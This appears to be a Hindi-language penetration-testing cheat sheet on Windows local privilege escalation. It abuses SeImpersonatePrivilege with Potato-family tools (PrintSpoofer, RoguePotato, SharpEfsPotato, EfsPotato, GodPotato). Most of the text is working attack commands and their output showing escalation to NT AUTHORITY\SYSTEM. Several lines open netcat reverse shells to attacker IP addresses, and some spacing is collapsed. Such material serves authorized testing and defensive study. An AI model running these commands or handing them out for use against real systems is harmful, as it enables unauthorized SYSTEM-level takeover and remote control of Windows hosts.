JuicyPotato Windows Server 2019 और Windows 10 build 1809 से आगे काम नहीं करता। हालाँकि, PrintSpoofer,RoguePotato,SharpEfsPotato,GodPotato,EfsPotato,DCOMPotato** का उपयोग समान विशेषाधिकारों का लाभ उठाने और NT AUTHORITY\SYSTEM स्तर की पहुंच प्राप्त करने के लिए किया जा सकता है। यह ब्लॉग पोस्टPrintSpoofer टूल पर गहराई से जाती है, जिसका उपयोग Windows 10 और Server 2019 होस्ट पर अनुकरण विशेषाधिकारों का दुरुपयोग करने के लिए किया जा सकता है जहाँ JuicyPotato अब काम नहीं करता।
Quick Demo
PrintSpoofer
c:\PrintSpoofer.exe-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"--------------------------------------------------------------------------------[+] Found privilege: SeImpersonatePrivilege[+] Named pipe listening...[+] CreateProcessAsUser() OKNULL
RoguePotato
c:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-l9999# In some old versions you need to use the "-f" paramc:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-f9999
SharpEfsPotato
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotatoby@bugch3ckLocalprivilegeescalationfromSeImpersonatePrivilegeusingEfsRpc.BuiltfromSweetPotatoby@_EthicalChaos_andSharpSystemTriggers/SharpEfsTriggerby@cube0x0.[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!C:\temp>typeC:\temp\w.logntauthority\system
EfsPotato
> EfsPotato.exe "whoami"Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
PartofGMH's fuck Tools, Code By zcgonvh.CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: NT Service\MSSQLSERVER[+] Pipe: \pipe\lsarpc[!] binding ok (handle=aeee30)[+] Get Token: 888[!] process with pid: 3696 created.==============================[x] EfsRpcEncryptFileSrv failed: 1818nt authority\system
GodPotato
> GodPotato -cmd "cmd /c whoami"# You can achieve a reverse shell like this.> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
